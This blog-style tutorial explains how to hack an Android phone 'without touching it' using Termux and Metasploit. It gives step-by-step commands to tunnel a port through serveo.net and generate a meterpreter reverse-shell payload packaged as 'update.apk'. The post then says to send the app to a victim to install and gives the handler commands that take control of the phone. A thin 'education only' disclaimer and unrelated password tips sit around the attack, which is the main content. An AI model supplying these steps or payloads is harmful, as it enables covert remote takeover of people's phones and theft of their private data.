Hack Android phones Without Root :- Hello Friends, I hope you are enjoying our previous posts on how to hack fb account . Today we have come back with another hacking tutorial, how to hack someone’s phone without touching it.
NOTE : THIS IS ONLY FOR EDUCATION PURPOSE DON’T USE IT FOR ILLEGAL USE.
What Is Hacking ?
Hacking is identifying weaknesses in a computer system or network so that its weaknesses can be exploited. Hacking example: using password cracking algorithms to gain access to the system
Computers have become essential for running a successful business. This is not sufficient for isolated computer systems; they need to build networks to facilitate communication with external businesses.
This exposes them to the outside world and hacking. Hacking means cyber crimes such as computer use fraud, privacy attacks, stealing corporate/personal data, etc.
Many organizations spend millions of dollars every year. Businessmen need to protect themselves against such attacks.
Requirements To Hack Android phones Without Root?
1. Android 5.0 and Above
2 . Termux android app. Download it from below.
3. Installed the Metasploit framework in termux . I will show you how to install Metasploit in termux below.
4. termux should be allowed to external storage. ( for this only enter this command at once ”termux-setup-storage” )
Step 1 : Intall Metasploit framework in termux to Hack Any Android Device
1. first install termux , links are given above .
2. open app and wait while it install some file .
3. hit the command.
apt update $ apt upgrade
4. then enter or copy the command
apt install curl
5. enter or copy the command
curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
6. now give permission by giving this command.
chmod +x metasploit.sh
7. now execute with this command.
8. and now wait until processing and downloading.. it can take upto 40 min , depend upon internet speed
9. now you have succesfully intalled the metasploit framework.
Step 2 : port forwarding
1.open termux and type the below command . it will succesfully install the open ssh
pkg install openssh
2. after that type the below command and your session will start .
ssh -R 4564:localhost:4564 serveo.net
3. Now the session has successfully start.
Step 3 : creating apk file with embedded payload
1. firstly type the below command to get a payload app
msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > storage/download/update.apk
2. wait for a min and you successfully create the payload app.
3. Now The Main Step Send The Created App to Your victim or Friend And Ask them To install this app.
Step 4 : setup metasploit in termux
1. Activate metasploit framework in termux by entering this command in new session
2. now type this command one by one.
- use exploit/multi/handler
- setpayload android/meterpreter/reverse_tcp
- set LHOST localhost
- set LPORT 4564
- exploit -j -z
3. bingo ……you have succesfully hack your victim phone.
How to get details from victim phone :
To view the list of available command just put a question mark (?) and hit enter or type the following commands from the image below .
How to Prevent Hacking ?
1. Create complex passwords. Your passwords to access your accounts on apps or websites should consist of a combination of numbers, upper- and lower-case letters, and special characters that is difficult to guess.
- Don’t use the same password for more than one website or account. This limits the damage to you if a hacker happens to crack one of your passwords.
2. Use a password manager. Password managers store and auto-fill your credentials for different sites, allowing you to create a complex and unique password for each site without having to worry about entering the password itself more than once
3. Don’t give out your password. This is an obvious piece of advice, but one that bears revisiting: with the exception of some school services, you shouldn’t ever have to provide a site administrator with your password for them to access your account
4. Change your passwords often. In addition to keeping your password a secret, you should change the passwords on your various accounts and devices at least once every six months.
5. Use two-factor authentication. Two-factor authentication requires you to enter a code sent to you in a text message or another service to access your account after you enter your user name and password. This makes it more difficult for a hacker to access your information, even if they are able to crack your password.
6. Avoid using the correct answer for security questions. When making security questions, don’t make the answer to them the correct answer. Hackers can find out your mother’s maiden name or what street you grew up on easily.